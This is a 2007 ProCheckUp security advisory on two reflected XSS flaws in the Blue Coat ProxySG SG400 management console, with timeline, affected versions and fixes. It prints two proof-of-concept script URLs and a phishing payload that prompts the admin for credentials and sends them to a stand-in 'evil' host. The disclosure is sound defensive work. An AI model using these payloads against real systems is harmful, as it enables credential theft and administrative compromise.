ProCheckUp Security Bulletin PR07-29: Two XSS on Blue Coat ProxySG Management Console

Vulnerability found: 23 July 2007

Vendor informed: 20 August 2007

Vulnerability fixed: 29 October 2007

Advisory publicly released: 1 November 2007

Severity: Medium

Description: Blue Coat SG400 is vulnerable to a couple of XSS holes.

Vulnerable server-side script / unfiltered parameter: /Secure/Local/console/install_upload_action/crl_format' / 'name'

Vulnerable server-side script / unfiltered parameter: '/Secure/Local/console/install_upload_from_file.htm' / 'file'

Notes: then admin user needs to be authenticated (HTTP basic authentication) for the injected JavaScript to run

Successfully tested on: Model: Blue Coat SG400 Software SGOS 4.2.1.6 Software Release ID: 25173

Proof of concept #1:

https://target:8082/Secure/Local/console/install_upload_action/crl_format?name="<script>alert("XSS")</script>%00

Injected payload: "<script>alert("XSS")</script>%00

Proof of concept #2:

https://target:8082/Secure/Local/console/install_upload_from_file.htm?file=<script>alert("XSS")</script><!--

Injected payload: <script>alert("XSS")</script><!--

A neat payload to inject instead of a alert() box would be a phishing attack which would forward the username and password to a third-party site (the code could be inserted from a third-party site).

i.e.:

<script> do {

a=prompt("Blue Coat SG400: an error has occurred\nPlease enter your USERNAME","");

b=prompt("Blue Coat SG400: an error has occurred\nPlease enter your PASSWORD","");

}while(a==null || b==null || a=="" || b=="");

alert("owned!:"+a+"/"+b);window.location="http://evil/?u="+a+"&p="+b</script><!--

Consequences:

An attacker may be able to cause execution of malicious scripting code in the browser of a Blue Coat SG400 admin who clicks on a link to a Blue Coat ProxySG Management Console. Such code would run within the context of the target domain.

This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: basic auth credentials stolen through a phishing attack as described in the Proof of Concept) to unauthorised third parties.

Fixed in:

4.2.6.1, 5.2.2.5

References:

http://www.procheckup.com/Vulnerability_2007.php

http://www.bluecoat.com/support/securityadvisories/advisory_cross-site_scripting_vulnerability

Credits: Adrian Pastor from ProCheckUp Ltd (www.procheckup.com)

Legal:

Copyright 2007 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.